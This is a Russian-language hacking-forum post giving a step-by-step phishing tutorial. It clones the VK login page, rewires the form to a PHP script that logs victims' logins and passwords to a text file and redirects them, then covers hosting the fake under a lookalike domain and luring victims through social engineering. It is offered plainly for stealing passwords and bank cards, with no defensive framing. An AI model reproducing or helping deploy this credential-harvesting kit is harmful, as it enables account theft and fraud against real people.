Как создать фейковый сайт и украсть пароли жертвы

admin · 02.08.2022

Копирование сайта

Для начала нам нужно скопировать оригинальную страницу, что бы наша получилась идентичной настоящей.
Это нужно для того, чтобы пользователь зашедший туда, увидел привычную и знакомую форму входа и без лишних размышлений ввёл свой логин и пароль.
Предлагаю рассмотреть все на примере создания фейковой страницы VK

Для начала создаём для нашего фейка отдельную папку на компьютере. Туда мы и будем скидывать все нужные для него файлы.
Далее открываем нужный нам сайт в браузере и заходим на страницу авторизации
Теперь сохраняем эту страницу: правая кнопка мыши -> Cохранить как...

В появившемся окне выбираем тип сохраняемого файла: Веб-страница полностью. В имени файла пишем index.htm

Теперь давай разбираться с кодом...
Разбираемся в HTML

С помощью блокнота открываем исходный код сохраненной страницы Для просмотра ссылки Войди или Зарегистрируйся

Много странных непонятных закорючек - это исходный код страницы.

Как говориться “глаза бояться, а руки делают”, поэтому не бойся и начинай работать

Помнишь, когда мы с тобой сохраняли страницу, рядом с полем для ввода логина и пароля наверняка были подписи (логично предположить, что там было написано "логин" и"пароль")? Вот по ним и будем ориентироваться.

Ищем среди всего этого безобразия такие слова. Рядом с ними на странице у нас располагались поля ввода логина и пасса. В html коде они будут выглядеть примерно вот так:

<input type="text" name="login" value="" ......<input type="password" name="password" ......

Имена полей (в коде идут после "name=") не всегда будут именно login и password. Где-то это могут быть e-mail и pass , а где-то и username, parol.(оформление и названия зависит от кодера и сайта)

P.S. Блок с надписями "логин", "пароль" и формами ввода почти всегда находится в тэге <form>.

Временно записываем или запоминаем имена этих паролей
Ищем через Ctrl+F запрос «action»

Меняем строку и прописываем параметру action значение Для просмотра ссылки Войди или Зарегистрируйся (если параметра action там нет - введите его сами: action="Для просмотра ссылки Войди или Зарегистрируйся")
Ищем параметр method (в той же строчке что form и action) и ставим ему значение “post” или “get”
Сохраняемся и закрываем.

Волшебный скрипт

Наш скрипт будет выполнять самую важную функцию – перехват и запись введенных жертвой логина и пароля.

Вот его код:

<?PHP$Log = $_POST['login'];$Pass = $_POST['password'];$log = fopen("database.txt","at");fwrite($log,"\n $Log:$Pass \n");fclose($log);echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://lleo.aha.ru/na/'></head></html>";?>

А теперь по полочкам:

В первых двух строках переменным Log и Pass присваиваются значения соответствующих полей из предыдущего файла. Именно для этого мы записывали названия полей с сохранённой страницы: мы должны указать их скрипту. Меняем login и password из квадратных скобок на то, как были названы поля ввода на нашей сохранённой странице (Кавычки не трогаем!).
В третьей строке происходит открытие файла database.txt для записи. (Можешь назвать этот файл как хочешь, хоть I_love_Hacker_Place.txt)
Главное - не забудь, как назвал (название должно быть написано английскими буквами) и создай текстовый документ с таким именем в папке с фейком.
Четвёртая строка - запись в файл строки вида \n $Log:$Pass \n, где \n - переход на новую строку, $Log:$Pass - значения переменных с логином и паролем, записанные через двоеточие.
Строка пятая - сохранение, закрытие файла.
Последняя строка - редирект (переадресация) на другую страницу (пока жертва не просекла, что это фейк). В этой строчке после URL= вписываем адрес страницы, куда попадёт пользователь сразу после того как введёт логин и пароль (и снова будь аккуратен с кавычкой после адреса - она должна там быть!). Лучше всего отправить его на настоящую страницу (ну откуда там ты страничку копировал?) с сообщением о вводе неверного пароля. Тогда бедолага решит что что-то не так ввёл, попробует снова и зайдёт, ничего не заподозрив!

Сохраняем файл с именем Для просмотра ссылки Войди или Зарегистрируйся в папку с фейком

Запускаем наш фейк в сеть!

Нам понадобится бесплатный хостинг с поддержкой php. Например:

Для просмотра ссылки Войди или Зарегистрируйся
Для просмотра ссылки Войди или Зарегистрируйся
Для просмотра ссылки Войди или Зарегистрируйся
Для просмотра ссылки Войди или Зарегистрируйся
Для просмотра ссылки Войди или Зарегистрируйся
Для просмотра ссылки Войди или Зарегистрируйся
Для просмотра ссылки Войди или Зарегистрируйся

Регистрируем домен на этом хосте с названием, максимально похожим на адрес страницы, которую мы подделываем (например Для просмотра ссылки Войди или Зарегистрируйся), чтобы нашей цели не бросалось в глаза.
Качаем Filezilla или любой другой файловый менеджер, открываем:

Подключаем полученный хост через Filezilla

Слева видим все папки и файлы нашего компьютера, справа – наш сервер. Осталось его только дополнить

Перекидываем все сохраненные файлы нашей фишинговой страницы на новоиспеченный сайт.
Создаем текстовый файл “Для просмотра ссылки Войди или Зарегистрируйся” (В нем и будут сохраняться все введенные логины и пароли в виде: “log : pass”)

Вместо localhost будем открывать тот адрес, который мы зарегистрировали. Соответственно, файл с сохранёнными паролями будет находиться там же (Для просмотра ссылки Войди или Зарегистрируйся).

В том же файловом менеджере ставим файлу максимальные права доступа – 777
Готово!

Теперь наш фишинговый сайт можно использовать в разных целях, но остался один главный шаг.
Социальная часть

Самый сложный и творческий этап. Придется импровизировать, как заманить жертву на фейк. Все зависит от тематики и интересов жертвы. Писать на почту, в другие мессенджеры, да хоть голубем эту ссылку отправляй. Это полностью твоя фантазия, в которой тебе помогут навыки социальной инженерии.
Итог:

Ты научился создавать фейковые страницы для любого сайта и теперь можешь заимствовать пароли (или даже банковские карты)
По этой схеме можно создавать фейки за 10 минут.

Как создать фейковый сайт и украсть пароли жертвы

admin

#root